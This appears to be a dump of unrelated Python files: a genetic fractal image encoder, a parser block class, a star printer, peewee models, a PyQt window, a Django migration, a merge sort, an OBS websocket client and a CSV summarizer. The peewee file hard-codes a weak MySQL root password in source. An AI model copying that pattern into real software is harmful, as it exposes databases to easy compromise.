multiprocessing.Process.__init__(self)
self.work_queue = work_queue
self.result_queue = result_queue
self.State = "Wait"
# Domain specific properties
self.mating_pool = props['S_b']
self.start_calc = event_start
self.N = props['N']; self.h = props['h']; self.w = props['w']
self.P_c = props['P_c']; self.h_dom = props['h_dom']
self.w_dom = props['w_dom']
self.mask_crossover = random.RandomState()
def run(self):
count = 0
while True:
if self.State == 'Wait':
self.start_calc.wait()
self.State = "Calculate"
elif self.State == 'Stop':
break
while self.State == "Calculate":
# get a part
req = self.work_queue.get()
if req == "Stop":
self.State = "Stop"
elif req == "Wait":
self.State = "Wait"
self.result_queue.put("ACK")
else:
try:
result = self.mating(req)
except MatingError, E:
result = E.reason
self.result_queue.put(result)
def mating(self, partition):
offsprings = []
for i in xrange(partition[0],partition[1]):
mating_pool = self.mating_pool[:].split()
idx_chosen_parent_1 = self.rank_selection()-1
idx_chosen_parent_2 = self.rank_selection()-1
try:
parent_1 = mating_pool[idx_chosen_parent_1]
parent_2 = mating_pool[idx_chosen_parent_2]
except:
error = MatingError()
error.set_reason(("Error_on_mating_pool_maybe_indexes",idx_chosen_parent_1,idx_chosen_parent_2, self.mating_pool))
raise error
try:
if random.random()<=self.P_c:
offpring_1, offpring_2 = self.crossover(parent_1, parent_2)
else:
offpring_1, offpring_2 = parent_1, parent_2
except:
error = MatingError()
error.set_reason(("Error_on_crossover",parent1,parent2))
raise error
offsprings.append(offpring_1)
offsprings.append(offpring_2)
return offsprings[0:partition[1]-partition[0]]
def rank_selection(self):
random.seed()
i = 1; chosen = False
while not chosen:
random.seed()
potential = random.randint(1, (self.N/2))
random.seed()
chosen = not random.randint(1, (self.N/2))>potential
return potential
def crossover(self, parent_1, parent_2):
child_1 = ''
child_2 = ''
mask = self.gen_mask_crossover()
for idx, mask_bit in enumerate(mask):
if mask_bit == '0':
child_1 += parent_1[idx]
child_2 += parent_2[idx]
else:
child_1 += parent_2[idx]
child_2 += parent_1[idx]
childs = []
for chromo in [child_1,child_2]:
childs.append(self.consistency_check(chromo))
return childs
def update_P_crossover(self, P_c):
self.P_c = P_c
def gen_mask_crossover(self):
return '{0:021b}'.format(self.mask_crossover.randint(2**21-1))
def consistency_check(self, chrom):
# out of bounds check
w, h = self.w,self.h
w_dom, h_dom = self.w_dom, self.h_dom
gen_x_dom = int(chrom[0:9],2)
gen_y_dom = int(chrom[9:18],2)
return '{0:09b}'.format(min(max(gen_x_dom,0),w-w_dom))+'{0:09b}'.format(min(max(gen_y_dom,0),h-h_dom))+chrom[18:21]
class Mutator(multiprocessing.Process):
    """Worker process that mutates chromosomes: the better half of the pool
    gets small (low-bit) perturbations, the worse half gets large (high-bit)
    perturbations plus a new flip gene.
    """
    def __init__(self, work_queue, result_queue, event_start, props):
        multiprocessing.Process.__init__(self)
        self.work_queue = work_queue
        self.result_queue = result_queue
        self.kill_received = False
        self.pool = props['pool']
        self.start_calc = event_start
        self.P_mb = props['P_mb']; self.P_mw = props['P_mw']
        self.h = props['h']; self.w = props['w']
        self.h_dom = props['h_dom']; self.w_dom = props['w_dom']
        self.State = "Wait"
    def run(self):
        # State machine mirroring Generator.run, with an extra in-band
        # "Update_mrate" request that refreshes the mutation probabilities.
        count = 0
        while True:
            if self.State == 'Wait':
                self.start_calc.wait()
                self.State = "Calculate"
            elif self.State == 'Stop':
                break
            while self.State == "Calculate":
                # get a part
                req = self.work_queue.get()
                if req == "Stop":
                    self.State = "Stop"
                elif req == "Wait":
                    self.State = "Wait"
                    self.result_queue.put("ACK")
                elif req == "Update_mrate":
                    # This is another inner state that holds until
                    # the mutation parameters are updated
                    while not self.work_queue.empty(): continue
                    self.result_queue.put("ACK")
                    P_m = self.work_queue.get()
                    self.P_mb = P_m[0]
                    self.P_mw = P_m[1]
                    self.result_queue.put("ACK")
                    self.State = "Wait"
                else:
                    result = []
                    # ROBUSTNESS FIX: pre-bind these so the error report in
                    # the except clause cannot itself raise NameError when
                    # reading the shared pool is what failed.
                    population = []
                    N = 0
                    try:
                        population = self.pool[:].split()
                        N = len(population)
                        best = population[0:N/2]
                        worst = population[N/2:N]
                        for chroma in best[req[0]:req[1]]:
                            result.append(self.mutate_best(chroma))
                        for chroma in worst[req[0]:req[1]]:
                            result.append(self.mutate_worst(chroma))
                    except:
                        result.append(["Mutation_Error",(population,N)])
                    self.result_queue.put(result)
    def mutate_best(self, chrom):
        """With probability P_mb, randomize the low 4 bits of x and of y."""
        gen_chrom = chrom
        if random.random() <= self.P_mb:
            gen_x_dom_HB = chrom[0:5]
            gen_y_dom_HB = chrom[9:14]
            gen_chrom = gen_x_dom_HB +'{0:04b}'.format(random.randint(2**4-1)) + gen_y_dom_HB +'{0:04b}'.format(random.randint(2**4-1))+chrom[18:21]
        return self.consistency_check(gen_chrom)
    def mutate_worst(self, chrom):
        """With probability P_mw, randomize the high 5 bits of x and of y
        plus the 3-bit flip gene, keeping each coordinate's low 4 bits."""
        gen_chrom = chrom
        if random.random() <= self.P_mw:
            gen_x_dom_LB = chrom[5:9]
            gen_y_dom_LB = chrom[14:18]
            # BUG FIX: the second low-bit slice was gen_x_dom_LB in the
            # original, so y reused x's low bits and gen_y_dom_LB was
            # never used at all.
            gen_chrom = '{0:05b}'.format(random.randint(2**5-1)) + gen_x_dom_LB + '{0:05b}'.format(random.randint(2**5-1)) + gen_y_dom_LB +'{0:03b}'.format(random.randint(2**3-1))
        return self.consistency_check(gen_chrom)
    def consistency_check(self, chrom):
        # out of bounds check: clamp the decoded x/y domain-block origin so
        # the domain block stays inside the image; flip gene passes through.
        w, h = self.w,self.h
        w_dom, h_dom = self.w_dom, self.h_dom
        gen_x_dom = int(chrom[0:9],2)
        gen_y_dom = int(chrom[9:18],2)
        return '{0:09b}'.format(min(max(gen_x_dom,0),w-w_dom))+'{0:09b}'.format(min(max(gen_y_dom,0),h-h_dom))+chrom[18:21]
class Fitness_evaluator(multiprocessing.Process):
    """Worker process that scores chromosome slices against the current
    range block.

    Protocol: the parent puts either a control token ("Next_ranBlk",
    "Wait", "Stop") or a (start, end) index pair on ``work_queue``;
    fitness heaps or "ACK" replies come back on ``result_queue``.  The
    ``event_start`` Event gates the calculation loop.

    NOTE: written for Python 2 (``xrange``, ``except X, e`` syntax,
    generator ``.next()``).
    """
    def __init__(self, work_queue, result_queue, event_start, props):
        # props: dict with image geometry ('h', 'w'), domain-block size
        # ('h_dom', 'w_dom'), 'RanBlockSize', the shared chromosome 'pool'
        # and the domain image 'Dom'.
        multiprocessing.Process.__init__(self)
        self.start_calc = event_start
        self.work_queue = work_queue
        self.result_queue = result_queue
        self.calc = False
        self.kill_received = False
        # Placeholder until the first "Next_ranBlk" advances the generator;
        # calculate_mse() relies on flatten() failing while this is an int.
        self.ranBlk = 0
        self.h = props['h']
        self.w = props['w']
        self.h_dom = props['h_dom']
        self.w_dom = props['w_dom']
        self.RanBlockSize = props['RanBlockSize']
        self.pool = props['pool']
        self.Dom = props['Dom']
        # Initial state
        self.State = "Wait"
        self.ranBlkIter=self.next_rangBlk()
    def run(self):
        # Simple state machine: Wait -> Calculate -> (Wait | Stop).
        count = 0  # NOTE(review): never used
        while True:
            if self.State == 'Wait':
                self.start_calc.wait()
                self.State = "Calculate"
            elif self.State == 'Stop':
                break
            flag_chRanBlk = False
            while self.State == "Calculate":
                # get a part
                req = self.work_queue.get()
                if req == "Next_ranBlk":
                    if flag_chRanBlk == False:
                        self.set_rangBlk()
                        self.result_queue.put("ACK")
                        flag_chRanBlk = True
                    else:
                        # This worker already advanced its range block; put
                        # the token back on the queue so a slower sibling
                        # process can consume it instead.
                        self.work_queue.put(req)
                elif req == "Stop":
                    self.State = "Stop"
                elif req == "Wait":
                    self.State = "Wait"
                    self.result_queue.put("ACK")
                else:
                    # req is a (start, end) slice into the shared pool of
                    # space-separated 21-bit chromosomes
                    result = self.calculate_Population_fitness(self.pool[:].split()[req[0]:req[1]])
                    self.result_queue.put(result)
    def next_rangBlk(self):
        # Generator that walks the image tile by tile (column-major); each
        # next() loads the following range block into self.ranBlk.
        # NOTE(review): the tile counts use w/8 and h/8 — this assumes
        # RanBlockSize is (8, 8); confirm against the caller.
        for i in xrange (int(self.w/8)):
            for j in xrange (int(self.h/8)):
                ranBlk = self.Dom[j*self.RanBlockSize[0]:j*self.RanBlockSize[0]+ self.RanBlockSize[0], i*self.RanBlockSize[1]:i*self.RanBlockSize[1]+self.RanBlockSize[1]]
                self.ranBlk = rgb2hex(ranBlk.copy())
                yield None
    def set_rangBlk(self):
        # Advance to the next range block (Python 2 generator API).
        self.ranBlkIter.next()
    def calculate_Population_fitness(self, part):
        """Score each chromosome in *part* against the current range block.

        Returns a heap of (fitness, chromosome) pairs, or an error string
        identifying the failing stage.
        """
        # (h,w)
        DomBlockSize = (16,16)
        RanBlockSize = (8,8)
        max_fitness = 1000000000  # cap used when MSE is (near) zero
        ranking = []
        for chrom in part:
            # genes
            gen_x_dom = chrom[0:9]
            gen_y_dom = chrom[9:18]
            gen_flip = chrom[18:21]
            # fenotypes
            fen_xdom = int(gen_x_dom,2) # 2 for binary representation
            fen_ydom = int(gen_y_dom,2)
            fen_flip = int(gen_flip,2)
            try:
                # 16x16 domain block at the decoded origin
                DomBlk = self.Dom[fen_ydom:fen_ydom+DomBlockSize[0] ,fen_xdom:fen_xdom+DomBlockSize[1]]
            except:
                return "DomBlkError"
            try:
                DomBlk_hex = rgb2hex(DomBlk.copy())
            except:
                return "rgb2hexError"
            try:
                # downscale the 16x16 domain block to the 8x8 range size
                temp = get_scaled.geometric_transform(DomBlk_hex, resize_func, output_shape=RanBlockSize)
            except:
                return "transformError"
            try:
                # apply one of the 8 dihedral (flip/rotate) transforms
                DomBlk_subsampled = get_dihedrical_transf(temp,fen_flip)
            except:
                return "dihedrTransformError"
            #p,q = calc_massic(DomBlk_subsampled,rngBlk)
            try:
                MSE = self.calculate_mse(DomBlk_subsampled)
            except MSEError,E:
                return E.reason
            try:
                # lower MSE -> higher fitness, capped at max_fitness
                rank = min(1/MSE,max_fitness)
            except ZeroDivisionError:
                rank = max_fitness
            heappush(ranking,(rank,chrom))
        return ranking
    def calculate_mse(self, domBlk_subSmpl):
        """Mean squared error between the subsampled domain block and the
        current range block (both hex-encoded pixel arrays).

        Raises MSEError with a descriptive reason on failure.
        """
        Error = MSEError()
        try:
            im1flat_T = domBlk_subSmpl.flatten()
            im2flat_T = self.ranBlk.flatten()
            im1flat = im1flat_T.copy()
            im2flat = im2flat_T.copy()
            length = float(len(im1flat))
        except:
            # self.ranBlk is still the int placeholder until the first
            # "Next_ranBlk"; flatten() fails in that case.
            Error.set_reason(("ran_Blk",self.ranBlk))
            raise Error
        MSE = 0
        for i in xrange(0,int(length)):
            pix_1 = im1flat[i]
            pix_2 = im2flat[i]
            rgb_1 = hex2rgb(pix_1)
            rgb_2 = hex2rgb(pix_2)
            try:
                # accumulate squared per-channel differences
                diff = array(rgb_1)-array(rgb_2)
                MSE += reduce(add, map(lambda k: k**2, diff))
            except:
                Error.set_reason("Reduce")
                raise Error
        MSE = MSE/(3*length)  # 3 colour channels
        return MSE
from numpy import array
class Fractal_encoder():
    """Coordinates the generator / fitness-evaluator / mutator worker
    processes of a genetic fractal image encoder.

    All worker families share one work_queue / result_queue pair; which
    family reacts is gated by its per-family start Event.  Chromosomes
    are 21-character bit strings stored space-separated in shared ctypes
    arrays: ``pool`` (whole population), ``S_b`` (best clan) and ``S_w``
    (worst clan).

    NOTE: written for Python 2 (``xrange``, integer division for buffer
    sizing, ``numpy...tostring()``).
    """
    def __init__(self, image, N_population, N_workers, DomBlockSize, RanBlockSize, props_generator, props_mutator):
        self.work_queue = Queue()
        self.result_queue = Queue()
        self.first_time=True
        self.generators = []
        self.fit_calculators = []
        self.mutators = []
        self.Dom = array(image,'ubyte')
        self.h, self.w = self.Dom.shape[0:2]
        self.DomBlockSize = DomBlockSize
        self.RanBlockSize = RanBlockSize
        self.N = N_population
        # Syncronized elements for population, best clan and worst clan.
        # Each chromosome is 21 chars and chromosomes are separated by a
        # single blank, hence N*21 + (N-1) characters per buffer.
        dummy_pool = numpy.array(''.zfill(N_population*21+N_population-1)).tostring()
        self.pool = Array('c', dummy_pool)
        dummy_pool_1 = numpy.array(''.zfill((N_population/2)*21+(N_population/2)-1)).tostring()
        self.S_b = Array('c', dummy_pool_1)
        self.S_w = Array('c', dummy_pool_1)
        props_generator.setdefault('S_b', self.S_b)
        props_mutator.setdefault('pool', self.pool)
        self.start_fit_calc = multiprocessing.Event()
        self.start_generators = multiprocessing.Event()
        self.start_mutators = multiprocessing.Event()
        # Spawn N_workers processes of each family, all started eagerly.
        for gen in xrange(N_workers):
            self.generators.append(Generator(self.work_queue, self.result_queue, self.start_generators,props_generator))
            self.generators[gen].start()
        props_fit_calc = dict( h = self.h, w = self.w, h_dom = 16, w_dom = 16, RanBlockSize = self.RanBlockSize, Dom = self.Dom, pool=self.pool)
        for fit in xrange(N_workers):
            self.fit_calculators.append(Fitness_evaluator(self.work_queue, self.result_queue, self.start_fit_calc,props_fit_calc))
            self.fit_calculators[fit].start()
        for mut in xrange(N_workers):
            self.mutators.append(Mutator(self.work_queue, self.result_queue, self.start_mutators, props_mutator))
            self.mutators[mut].start()
        self.curr_ranBlk = []
    def update_pool(self,population=None):
        """Serialize *population* (default: S_b followed by S_w) into the
        shared ``pool`` buffer, blank-separated."""
        blank = ' '
        offset = 0
        if population==None:
            population = self.S_b[:].split()+self.S_w[:].split()
        chrom_len = len(population[0])
        N = len(population)
        for idx, td in enumerate(population):
            # every chromosome except the last is followed by one blank
            if not offset+21 == N*chrom_len+N-1:
                self.pool[offset:offset+22] = td+blank
                offset+=21+1
            else:
                self.pool[offset:offset+21] = td
    def update_Sw(self,population):
        """Serialize *population* into the worst-clan buffer ``S_w``."""
        offset = 0
        blank = ' '
        chrom_len = len(population[0])
        N = len(population)
        for idx, td in enumerate(population):
            if not offset+21 == N*chrom_len+N-1:
                self.S_w[offset:offset+22] = td+blank
                offset+=21+1
            else:
                self.S_w[offset:offset+21] = td
    def update_Sb(self,population):
        """Serialize *population* into the best-clan buffer ``S_b``."""
        offset = 0
        blank = ' '
        chrom_len = len(population[0])
        N = len(population)
        for idx, td in enumerate(population):
            if not offset+21 == N*chrom_len+N-1:
                self.S_b[offset:offset+22] = td+blank
                offset+=21+1
            else:
                self.S_b[offset:offset+21] = td
    def next_rangBlk(self):
        """Generator: step to the next range block, column-major.

        Each next() updates ``self.curr_ranBlk`` and tells every fitness
        worker to advance its own copy of the range block, waiting for
        one ACK per worker before yielding.
        NOTE(review): tile counts use w/8, h/8 — assumes RanBlockSize is
        (8, 8); confirm.
        """
        for i in xrange (int(self.w/8)):
            for j in xrange (int(self.h/8)):
                ranBlk = self.Dom[j*self.RanBlockSize[0]:j*self.RanBlockSize[0]+ self.RanBlockSize[0], i*self.RanBlockSize[1]:i*self.RanBlockSize[1]+self.RanBlockSize[1]]
                self.curr_ranBlk = rgb2hex(ranBlk.copy())
                for fit_calculator in self.fit_calculators:
                    self.work_queue.put("Next_ranBlk")
                self.start_fit_calc.set()
                ACKS = []
                while len(ACKS) < len(self.fit_calculators):
                    ACKS.append(self.result_queue.get())
                self.start_fit_calc.clear()
                yield self.curr_ranBlk
    def calculate_fitness(self, partition):
        """Fan *partition* (index-pair slices) out to the fitness workers,
        merge the returned heaps and keep the best half as the mating
        pool, which also becomes the new best clan (S_b)."""
        count = 0  # NOTE(review): never used
        for part in partition:
            self.work_queue.put(part)
        self.start_fit_calc.set()
        # collect the results off the queue
        results = []
        while len(results) < len(partition):
            result = self.result_queue.get()
            results.append(result)
        queue = []
        for h in results:
            queue = merge_heaps(queue,h)
        mating_pool = nlargest(self.N/2,queue) # keep the upper half only:
                                               # these go to the superior clan
                                               # and are the chroms chosen for mating
        self.start_fit_calc.clear()
        # park the workers back in Wait state and drain one ACK each
        for calculator in self.fit_calculators:
            self.work_queue.put("Wait")
        ACKS = []
        while len(ACKS) < len(self.fit_calculators):
            ACKS.append(self.result_queue.get())
        self.update_Sb([chrom for meas,chrom in mating_pool])
        return mating_pool
    def generate_new_offsprings(self, partition):
        """Fan *partition* out to the generator workers; the concatenated
        offspring become the new worst clan (S_w)."""
        for part in partition:
            self.work_queue.put(part)
        self.start_generators.set()
        # collect the results off the queue
        results = []
        while len(results) < len(partition):
            result = self.result_queue.get()
            results.append(result)
        offsprings = []
        for resulting in results:
            offsprings+=resulting
        self.start_generators.clear()
        # park the generators back in Wait state
        for generators in self.generators:
            self.work_queue.put("Wait")
        ACKS = []
        while len(ACKS) < len(self.generators):
            ACKS.append(self.result_queue.get())
        self.update_Sw(offsprings)
        return offsprings
    def apply_mutation(self, partition):
        """Fan *partition* out to the mutator workers and return the
        concatenated mutated population."""
        count = 0  # NOTE(review): never used
        for part in partition:
            self.work_queue.put(part)
        self.start_mutators.set()
        # collect the results off the queue
        results = []
        while len(results) < len(partition):
            result = self.result_queue.get()
            results.append(result)
        mutated_population = []
        for result in results:
            mutated_population+=result
        self.start_mutators.clear()
        # park the mutators back in Wait state
        for mutator in self.mutators:
            self.work_queue.put("Wait")
        ACKS = []
        while len(ACKS) < len(self.mutators):
            ACKS.append(self.result_queue.get())
        return mutated_population
    def update_mutation_rate(self, rate_Pmb, rate_Pmw):
        """Push new mutation probabilities (best clan, worst clan) to the
        mutator workers.

        NOTE(review): the ACK loops below count len(fit_calculators) and
        len(generators) although the mutators are being addressed; this
        only works because every family has N_workers members — confirm
        intent.
        """
        for mutator in self.mutators:
            self.work_queue.put("Update_mrate")
        self.start_mutators.set()
        ACKS = []
        while len(ACKS) < len(self.fit_calculators):
            ACKS.append(self.result_queue.get())
        self.start_mutators.clear()
        for mutator in self.mutators:
            self.work_queue.put((rate_Pmb, rate_Pmw))
        ACKS = []
        while len(ACKS) < len(self.generators):
            ACKS.append(self.result_queue.get())
    def finish_all(self):
        """Shut everything down: send one "Stop" per worker, wake each
        family, join all processes, then terminate() as a final sweep."""
        for fit_calculator in self.fit_calculators:
            self.work_queue.put("Stop")
        self.start_fit_calc.set()
        for mutator in self.mutators:
            self.work_queue.put("Stop")
        self.start_mutators.set()
        for generator in self.generators:
            self.work_queue.put("Stop")
        self.start_generators.set()
        for fit_calculator in self.fit_calculators:
            fit_calculator.join()
        for mutator in self.mutators:
            mutator.join()
        for generator in self.generators:
            generator.join()
        # terminate() after join() is a no-op safety net for stragglers
        for fit_calculator in self.fit_calculators:
            fit_calculator.terminate()
        for mutator in self.mutators:
            mutator.terminate()
        for generator in self.generators:
            generator.terminate()
        self.start_generators.clear()
        self.start_mutators.clear()
        self.start_fit_calc.clear()
|
# -*- encoding: utf-8 -*-
from bnf import Group, TokenFunctor
from tl import ast
class Block(Group):
    """BNF group matching a keyword-introduced block statement, i.e.
    ``keywords [ (expression) ] { statements }``.

    On a successful match an ``ast.Block`` with its own scope is
    recorded in the current scope; the parenthesized expression is only
    matched when *with_expression* is True.
    """
    _keywords = None          # token or list of tokens opening the block
    _with_expression = None   # whether a parenthesized expression follows

    def __init__(self, keywords, with_expression, min=1, max=1):
        self._keywords = keywords
        self._with_expression = with_expression
        group = [self._keywords]
        if self._with_expression == True:
            # imported lazily — presumably to avoid a circular import;
            # same for Statement below
            from tl.bnf.expression import Expression
            group.extend(["(", Expression, ")"])
        from tl.bnf.statement import Statement
        group.extend([
            "{",
            Group([Statement], min=0, max=-1),
            "}",
            TokenFunctor(self.endScope)]
        )
        Group.__init__(self, group, min=min, max=max)
        self._scope = None
        self._expr = None

    def match(self, context):
        """Match the block, managing expression/scope begin/end pairing."""
        if self._with_expression == True:
            self._expr = context.beginExpression()
        if isinstance(self._keywords, list):
            name = "-".join(self._keywords)+'_'
        else:
            name = str(self._keywords)+'_'
        # open a dedicated scope for the block's statements
        self._scope = context.beginScope(
            ast.SCOPE_TYPES['block'],
            name,
            generate_unique=True
        )
        res = Group.match(self, context)
        if self._with_expression == True:
            context.endExpression()
        # On success endScope() has already closed the scope and reset
        # self._scope to None — this cleanup only fires on a failed match.
        if self._scope is not None:
            context.endScope()
        return res

    def endScope(self, context):
        # TokenFunctor callback fired after the closing '}' matched:
        # close the scope, attach it to the parent scope, and record the
        # Block statement in the AST.
        context.endScope()
        context.getCurrentScope().childs.append(self._scope)
        if self._expr is not None:
            self._expr = self._expr.clean()
        statement = ast.Block(self._keywords, self._expr, self._scope)
        context.getCurrentScope().statements.append(statement)
        self._scope = None
        return True

    def clone(self):
        # NOTE(review): relies on _min/_max being set by Group.__init__
        return Block(self._keywords, self._with_expression, self._min, self._max)
|
"""Output a tree of stars like so:
*
***
*
***
*****
*
***
*****
*******
Input argument is the number of levels to the tree (3 in this example)
"""
from sys import argv
def build_tree_rows(levels):
    """Return the star tree as a list of centered strings.

    Split out of main() so the formatting logic can be tested without
    capturing stdout.  Segment ``level`` (0-based) contributes
    ``level + 2`` rows of 1, 3, 5, ... stars, each centered in a field
    of ``2 * levels + 2`` characters.
    """
    width = 2 * levels + 2
    rows = []
    for level in range(levels):
        for sub_level in range(level + 2):
            stars = ((2 * sub_level) + 1) * '*'
            rows.append('{0:^{1}}'.format(stars, width))
    return rows


def main(levels):
    """Print a tree of stars with *levels* segments (see module docstring).

    BUGFIX: the original used Python-2-only constructs (``xrange`` and the
    ``print (...).format(...)`` statement form, which breaks under
    Python 3); this version runs unchanged on both Python 2 and 3.
    """
    for row in build_tree_rows(levels):
        print(row)


if __name__ == '__main__':
    main(int(argv[1]))
|
from peewee import *
import datetime
# Shared peewee database handle for the models below.
# NOTE(review): credentials are hard-coded in source — move user/password
# to configuration or environment variables before deploying.
db=MySQLDatabase("mydb",user="root",password="Aa123456789",host="localhost",port=3306)
class Player(Model):
    """A registered member and their subscription details."""
    name=CharField(null=False,unique=False)
    age=IntegerField(null=False)
    phone=BigIntegerField(null=False)
    sport=CharField(null=False)
    # subscription price/type may be absent (nullable) for members
    # without an active subscription
    sub_price = IntegerField(null=True)
    sub_type = CharField(null=True)
    # default is the callable datetime.datetime.now (not now()), so the
    # timestamp is evaluated per row at insert time
    start_at = DateTimeField(default=datetime.datetime.now)
    end_at = DateTimeField(default=datetime.datetime.now)
    in_diet=CharField(max_length=100)
    other=CharField(max_length=300,null=True ,default=" ")
    class Meta:
        database = db
class sales(Model):
    """A sale transaction (title, unit price, quantity, timestamp).

    NOTE(review): class name is lowercase, unlike Player — consider
    renaming for consistency (would require a schema migration).
    """
    title = CharField( null=False, unique=False )
    price = IntegerField( null=False )
    happend_at = DateTimeField(default=datetime.datetime.now)
    count=IntegerField( null=False )
    class Meta:
        database = db
class masrofat(Model):
    """An expense record ("masrofat" — presumably Arabic for expenses;
    confirm with the author)."""
    title = CharField( null=False, unique=False )
    price = DecimalField( null=False )
    happend_at = DateTimeField(default=datetime.datetime.now)
    class Meta:
        database = db
# Connect and create the tables immediately.
# NOTE(review): these run as a side effect of importing this module;
# consider guarding with `if __name__ == '__main__':`.
db.connect()
db.create_tables([Player,sales,masrofat])
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import Utils
from PyQt5.QtWidgets import QMainWindow
class MainWindow(QMainWindow):
    """Main window that enforces a fixed width:height aspect ratio
    (height == width * self.rate) while the user resizes it."""

    def __init__(self):
        super().__init__()
        self.statusBar().showMessage('选择连接设备')
        self.resize(500, 500)
        self.setWindowTitle('Telecontroller')
        Utils.center(self)
        # height/width ratio enforced by resizeEvent (was a magic 2.3
        # duplicated inline there)
        self.rate = 2.3

    def resizeEvent(self, QResizeEvent):
        """Re-resize the window so that height == width * self.rate.

        Only the dimension the user did NOT drag is adjusted; if both
        changed (or the ratio already holds) nothing is done.
        """
        # BUGFIX: message previously read 'resizeEvnet'
        print('resizeEvent: %s' % QResizeEvent.size())
        new_width = QResizeEvent.size().width()
        new_height = QResizeEvent.size().height()
        old_width = QResizeEvent.oldSize().width()
        old_height = QResizeEvent.oldSize().height()
        if int(new_width * self.rate) == new_height:
            return  # already at the target ratio — avoid resize loops
        if new_height != old_height and new_width == old_width:
            # height was dragged: derive the width.
            # BUGFIX: QWidget.resize requires ints; the division produced
            # a float and raised TypeError under PyQt5.
            self.resize(int(new_height / self.rate), new_height)
        elif new_width != old_width and new_height == old_height:
            # width was dragged: derive the height
            self.resize(new_width, int(new_width * self.rate))

    def changeEvent(self, QEvent):
        """changeEvent hook — intentionally a no-op."""
        pass

    def moveEvent(self, QMoveEvent):
        """Log window moves for debugging."""
        print('moveEvent: %s' % QMoveEvent.pos())
if __name__ == '__main__':
    # Manual test entry point: show the window and run the Qt event loop.
    import sys
    from PyQt5.QtWidgets import QApplication
    app = QApplication(sys.argv)
    window = MainWindow()
    window.show()
    sys.exit(app.exec_())
# Generated by Django 2.2.14 on 2020-08-03 17:16
from django.db import migrations
class Migration(migrations.Migration):
    """No-op merge migration: ties together the two leaf migrations
    0008 and 0009 of the 'purchase' app without any schema changes."""

    dependencies = [
        ('purchase', '0008_balance_testnet_amount'),
        ('purchase', '0009_purchase_group'),
    ]

    operations = [
    ]
|
def msort(l):
    """Merge sort.

    Returns *l* itself for lists of length 0 or 1, otherwise a new
    sorted list.  The merge is stable: on ties the element from the
    left (earlier) half is taken first.

    BUGFIX: the bare ``except:`` that terminated the merge loop caught
    every exception (e.g. TypeError from incomparable elements), not
    just iterator exhaustion; narrowed to ``StopIteration``.
    """
    if len(l) > 1:
        mid = len(l) // 2
        left = iter(msort(l[:mid]))
        right = iter(msort(l[mid:]))
        # both halves are non-empty here, so these next() calls are safe
        x1 = next(left)
        x2 = next(right)
        l = []
        try:
            while True:
                if x1 <= x2:
                    l.append(x1)
                    x1 = next(left)
                else:
                    l.append(x2)
                    x2 = next(right)
        except StopIteration:
            # One side ran dry right after its element was appended; the
            # comparison tells us which one, so flush the other side's
            # pending element and whatever remains behind it.
            if x1 <= x2:
                l.append(x2)
                l.extend(right)
            else:
                l.append(x1)
                l.extend(left)
    return l
import json
import logging
import threading
import websocket
class OBSRemote(object):
    """Small client for the legacy OBS Remote websocket API.

    Mirrors connection/streaming state from the status updates OBS
    pushes, and can toggle streaming or switch profiles.
    """

    def __init__(self, url):
        self.logger = logging.getLogger("OBSRemote")
        self.url = url
        # state mirrored from OBS push updates
        self.streaming = False
        self.streamTime = 0
        self.connected = False

    def start(self):
        """Open the websocket and pump it on a background thread."""
        self.logger.info("Attempting to open comms with OBS")
        self.ws = websocket.WebSocketApp(self.url,
                                         on_open=self.on_open,
                                         on_message=self.on_message,
                                         on_error=self.on_error,
                                         on_close=self.on_close,
                                         subprotocols=["obsapi"])
        self.run_thread = threading.Thread(target=self.ws.run_forever)
        self.run_thread.start()

    def stop(self):
        """Close the websocket; run_forever() then returns and the
        background thread exits."""
        self.logger.info("Closing comms with OBS")
        self.ws.close()

    def on_open(self, *args):
        self.logger.info("Communication with obs established")
        self.connected = True

    def on_message(self, ws, msg):
        """Update local state from a pushed OBS status message; a
        malformed message is logged and ignored so the reader thread
        survives."""
        try:
            decoded = json.loads(msg)
            update = decoded.get('update-type')
            if update == 'StreamStatus':
                self.streamTime = decoded['total-stream-time']
                self.streaming = decoded['streaming']
            elif update == "StreamStarting":
                self.streaming = True
            elif update == "StreamStopping":
                self.streaming = False
        except Exception as E:
            # BUGFIX: Logger.warn is a deprecated alias — use warning()
            self.logger.warning('Bad thing happened parsing obsremote message')
            self.logger.warning(str(E))

    def on_error(self, ws, error):
        # BUGFIX: not every error object carries an errno attribute
        # (e.g. a plain ValueError), so probe with getattr instead of
        # direct attribute access.  10061 is Windows' WSAECONNREFUSED.
        if getattr(error, 'errno', None) == 10061:
            self.logger.warning("Error, connection to OBS refused, check OBS is running.")
        else:
            self.logger.warning('Error ' + str(error))
        self.connected = False

    def on_close(self, ws):
        self.logger.info('Socket closed')
        self.connected = False
        self.streaming = False

    def set_profile(self, name):
        """Ask OBS to switch to the named profile."""
        self.logger.info("Setting profile to : %s" % name)
        msg = {'message-id': 'ffff34234',
               'request-type': "SetProfile",
               'profileName': name}
        self.ws.send(json.dumps(msg))

    def _toggle_streaming(self, label, preview):
        # Shared body of start_streaming / stop_streaming (was duplicated).
        self.logger.info("Sending %s" % label)
        msg = {'message-id': "123123d",
               'request-type': "StartStopStreaming"}
        if preview:
            msg["preview-only"] = True
        self.ws.send(json.dumps(msg))

    def start_streaming(self, preview=False):
        """Start streaming unless a stream is already running."""
        if not self.streaming:
            self._toggle_streaming("StartStream", preview)

    def stop_streaming(self, preview=False):
        """Stop streaming if a stream is currently running."""
        if self.streaming:
            self._toggle_streaming("StopStream", preview)
|
import csv
import re
import sys
import math
def create_summary_files(raw_file, data_file, avgs_file, stds_file):
    """Summarize a CSV file whose rows start with a quoted place field.

    Expected row layout (inferred from the quote-splitting below, TODO
    confirm with a sample file): ``"place, lat, lon",v1,v2,...`` with a
    header line first.  Cells equal to "missing" are excluded from the
    statistics.  Writes three files:
      - avgs_file: header of variable names + one row of means
      - stds_file: same header + one row of (population) std deviations
      - data_file: cleaned data with a 'place' column prepended
    """
    with open(raw_file, 'r') as f:
        # header: the first three columns are the place/lat/lon group
        add_variables = f.readline().strip().split(',')[3:]
        variables = ['lat', 'lon']
        for var in add_variables:
            var = var.replace('"','').strip()
            variables.append(var)
        data = []
        places = []
        for line in f:
            # text inside the first pair of quotes, before the first comma
            place = line.split('"')[1].split(",")[0]
            places.append(place)
            # lat/lon are the 2nd/3rd comma fields inside the quotes; the
            # remaining variables follow the closing quote
            data_on_line = line.split('"')[1].split(",")[1:3] + line.split('"')[3].split(",")
            if data_on_line[0] != "lat":
                data.append(data_on_line)
    # NOTE(review): `places` is appended unconditionally while `data` is
    # guarded by the "lat" check above; if a stray header row ever passed
    # the loop, places and data would fall out of alignment.
    means = []
    stds = []
    for i in range(len(variables)-2):
